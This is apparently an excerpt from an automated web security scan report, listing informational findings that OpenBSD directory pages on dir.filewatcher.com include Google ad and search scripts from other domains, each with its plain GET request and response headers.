Expires: Mon, 31 Jan 2011 15:02:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.1/</title>
</head>
<b
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.99. http://dir.filewatcher.com/d/OpenBSD/4.1/alpha.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.1/alpha.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.1/alpha.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:22 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "/kjdze4x41CPe5TuJm7UeQ"
Content-Length: 13066
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:22 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 155
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.1/alpha/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.100. http://dir.filewatcher.com/d/OpenBSD/4.1/alpha/aub-2.0.5.tgz.32475.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.1/alpha/aub-2.0.5.tgz.32475.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.1/alpha/aub-2.0.5.tgz.32475.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:21 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "7VuYOQlGD9x2GFM1KZWiog"
Content-Length: 20401
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 155
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.101. http://dir.filewatcher.com/d/OpenBSD/4.1/i386.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.1/i386.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.1/i386.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:17 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "BUp4cKcoevIhEW5t1rWQcA"
Content-Length: 13011
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:17 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.1/i386/</title>
</hea
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.102. http://dir.filewatcher.com/d/OpenBSD/4.1/i386/aub-2.0.5.tgz.32473.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.1/i386/aub-2.0.5.tgz.32473.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.1/i386/aub-2.0.5.tgz.32473.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:15 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "wlm683WbAi037RAQWrT8VA"
Content-Length: 22662
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 155
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.103. http://dir.filewatcher.com/d/OpenBSD/4.1/mips64.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.1/mips64.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.1/mips64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:20 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "/KZHP9k6deDcKA/RRtTPpA"
Content-Length: 13080
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:20 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.1/mips64/</title>
</h
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.104. http://dir.filewatcher.com/d/OpenBSD/4.1/mips64/aub-2.0.5.tgz.32471.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.1/mips64/aub-2.0.5.tgz.32471.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.1/mips64/aub-2.0.5.tgz.32471.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:19 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "IhWg+v1MTAtlwa1SgiETQw"
Content-Length: 22652
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:19 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 155
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.105. http://dir.filewatcher.com/d/OpenBSD/4.1/sparc.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.1/sparc.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.1/sparc.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:24 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "vCza/GTygI3RkLITplJYdA"
Content-Length: 12981
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.1/sparc/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.106. http://dir.filewatcher.com/d/OpenBSD/4.1/sparc/aub-2.0.5.tgz.32480.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.1/sparc/aub-2.0.5.tgz.32480.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.1/sparc/aub-2.0.5.tgz.32480.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:24 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "X9MgYBFw7AKSbPw/mZFSmA"
Content-Length: 20380
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.107. http://dir.filewatcher.com/d/OpenBSD/4.1/sparc64.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.1/sparc64.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.1/sparc64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:19 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "uQDTQLRMc6YIbAIQ8/zgLQ"
Content-Length: 13112
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:19 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 155
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.1/sparc64/</title>
</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.108. http://dir.filewatcher.com/d/OpenBSD/4.1/sparc64/aub-2.0.5.tgz.32476.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.1/sparc64/aub-2.0.5.tgz.32476.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.1/sparc64/aub-2.0.5.tgz.32476.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:18 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "RJXDg++Gd640m7L2IsOVRA"
Content-Length: 22403
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.109. http://dir.filewatcher.com/d/OpenBSD/4.2.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.2.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.2.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:42 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Y0zdzepuqutGRuMEaf323g"
Content-Length: 5419
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:42 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 171
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.2/</title>
</head>
<b
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.110. http://dir.filewatcher.com/d/OpenBSD/4.2/alpha.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.2/alpha.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.2/alpha.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:35 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "YboB2yc9PF83jl+NYrQYfA"
Content-Length: 13065
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 155
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.2/alpha/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.111. http://dir.filewatcher.com/d/OpenBSD/4.2/alpha/aub-2.0.5.tgz.32467.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.2/alpha/aub-2.0.5.tgz.32467.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.2/alpha/aub-2.0.5.tgz.32467.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:33 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "GmLk8R3/tGBN7dqZ5++dSA"
Content-Length: 22328
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 156
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.112. http://dir.filewatcher.com/d/OpenBSD/4.2/amd64.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.2/amd64.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.2/amd64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:39 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "AdTLNYd3xEUnhkpRp6zwlw"
Content-Length: 13024
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 170
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.2/amd64/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.113. http://dir.filewatcher.com/d/OpenBSD/4.2/amd64/aub-2.0.5.tgz.32461.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.2/amd64/aub-2.0.5.tgz.32461.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.2/amd64/aub-2.0.5.tgz.32461.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:38 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "JkFpCgLlVGqsLda3JsK6lQ"
Content-Length: 22721
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 168
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.114. http://dir.filewatcher.com/d/OpenBSD/4.2/i386.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.2/i386.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.2/i386.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:41 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "YWfGqri655Liq/jrqHWigA"
Content-Length: 12987
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 170
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

